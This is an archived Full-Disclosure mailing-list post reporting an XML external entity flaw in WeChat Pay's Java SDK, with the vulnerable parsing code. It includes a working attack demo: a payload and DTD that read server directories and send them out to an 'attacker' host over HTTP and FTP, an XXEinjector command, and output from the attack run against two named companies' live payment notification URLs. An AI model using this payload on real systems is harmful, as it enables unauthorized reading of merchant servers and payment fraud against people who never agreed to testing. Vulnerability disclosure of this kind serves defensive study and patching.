| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALtHGqBsTuSm+6NkBwMYVei_GECQH45CEz6f1UDyyZYBFwUXLg@mail.gmail.com>
Date: Sun, 1 Jul 2018 08:57:05 -0700
From: Rose Jackcode <1024rosecode@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant
websites)
Hi List,
[Title]
XXE in WeChat Pay Sdk ( WeChat leave a backdoor on merchant websites)
------------------------------------------
[Background]
“Mobile payments surge to $9 trillion a year, changing how people shop,
borrow—even panhandle”, as WSJ.com once reported. As a payment security
researcher, I occasionally found a perilous problem about WeChat Pay which
I think may be esay to make use of. Therefore, I hope to be able to
contact with WeChat Pay quickly.
------------------------------------------
[Description]
When using WeChat payment merchants need providing a notification URL
to accept asynchronous payment results. Unfortunately, WeChat
unintentionally provides a xxe vulnerability in the JAVA version SDK which
handles this result. The attacker can build malicious payload towards the
notification URL to steal any information of the merchant server as he or
she want. Once the attacker get the crucial security key (md5-key and
merchant-Id etc.) of the merchant , he can even buy anything without paying
by just sending forged info to deceive the merchants.
WeChat can fix it by updating the SDK quite easily, however the bad side
is while exposing merchants may need a long time to go for the sake of time,
cost and skills needed.
------------------------------------------
[Authors]
1024fresher
------------------------------------------
[Detail]
The SDK in this page: https://pay.weixin.qq.com/wiki/doc/api/jsapi.php
chapter=11_1
Just in java vision:
https://pay.weixin.qq.com/wiki/doc/api/download/WxPayAPI_JAVA_v3.zip
or
https://drive.google.com/file/d/1AoxfkxD7Kokl0uqILaqTnGAXSUR1o6ud/view(
Backup )
README.md in WxPayApi_JAVA_v3.zip,it show more details:
notify code example:
[
String notifyData = "....";
MyConfig config = new MyConfig();
WXPay wxpay = new WXPay(config);
//conver to map
Map<String, String> notifyMap = WXPayUtil.xmlToMap(notifyData);
if (wxpay.isPayResultNotifySignatureValid(notifyMap)) {
//do business logic
}
else {
}
]
WXPayUtil source code
[
public static Map<String, String> xmlToMap(String strXML) throws
Exception {
try {
Map<String, String> data = new HashMap<String, String>();
/*** not disabled xxe *****/
//start parse
DocumentBuilderFactory documentBuilderFactory =
DocumentBuilderFactory.newInstance();
DocumentBuilder documentBuilder =
documentBuilderFactory.newDocumentBuilder();
InputStream stream = new ByteArrayInputStream(strXML.getBytes(
"UTF-8"));
org.w3c.dom.Document doc = documentBuilder.parse(stream);
//end parse
doc.getDocumentElement().normalize();
NodeList nodeList = doc.getDocumentElement().getChildNodes();
for (int idx = 0; idx < nodeList.getLength(); ++idx) {
Node node = nodeList.item(idx);
if (node.getNodeType() == Node.ELEMENT_NODE) {
org.w3c.dom.Element element = (org.w3c.dom.Element) node
;
data.put(element.getNodeName(), element.getTextContent
());
}
}
try {
stream.close();
} catch (Exception ex) {
// do nothing
}
return data;
} catch (Exception ex) {
WXPayUtil.getLogger().warn("Invalid XML, can not convert to
map. Error message: {}. XML content: {}", ex.getMessage(), strXML);
throw ex;
}
}
]
------------------------------------------
[Attack demo]
Post merchant notification url with payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % attack SYSTEM "file:///etc/">
<!ENTITY % xxe SYSTEM "http://attacker:8080/shell/data.dtd">
%xxe;
]>
data.dtd:
<!ENTITY % shell "<!ENTITY % upload SYSTEM 'ftp://attack:33/%attack;
'>">
%shell;
%upload;
or use XXEinjector tool 【https://github.com/enjoiz/XXEinjector】
ruby XXEinjector.rb --host=attacker --path=/etc --file=req.txt --ssl
req.txt :
POST merchant_notification_url HTTP/1.1
Host: merchant_notification_url_host
User-Agent: curl/7.43.0
Accept: */*
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
XXEINJECT
In order to prove this, I got 2 chinese famous company:
a、momo: Well-known chat tools like WeChat
b、vivo :China's famous mobile phone,that also famous in my country
Example momo :
attack:
notify url: https://pay.immomo.com/weixin/notify
cmd: /home/
result:
***
logs
zhang.jiax**
zhang.shaol**
zhang.xia**
****
attack:
notify url: https://pay.immomo.com/weixin/notify
cmd: /home/logs
result:
***
moa-service
momotrace
****
Example vivo :
attack:
notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
cmd: /home/
result:
tomcat
attack:
notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
cmd: /home/tomcat
result:
.bash_logout
.bash_profile
.bashrc
logs
attack:
notify url: https://pay.vivo.com.cn/webpay/wechat/callback.oo
cmd: /home/tomcat/logs
result:
****
tomcat-2018-06-28.log
tomcat-2018-06-29.log
tomcat-2018-06-30.log
*****
------------------------------------------
[Reference]
https://www.youtube.com/watch?v=BZOg_NgvP18
https://www.blackhat.com/docs/us-15/materials/us-15-Wang-FileCry-The-New-Age-Of-XXE-java-wp.pdf
Regards,
1024rosecode
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists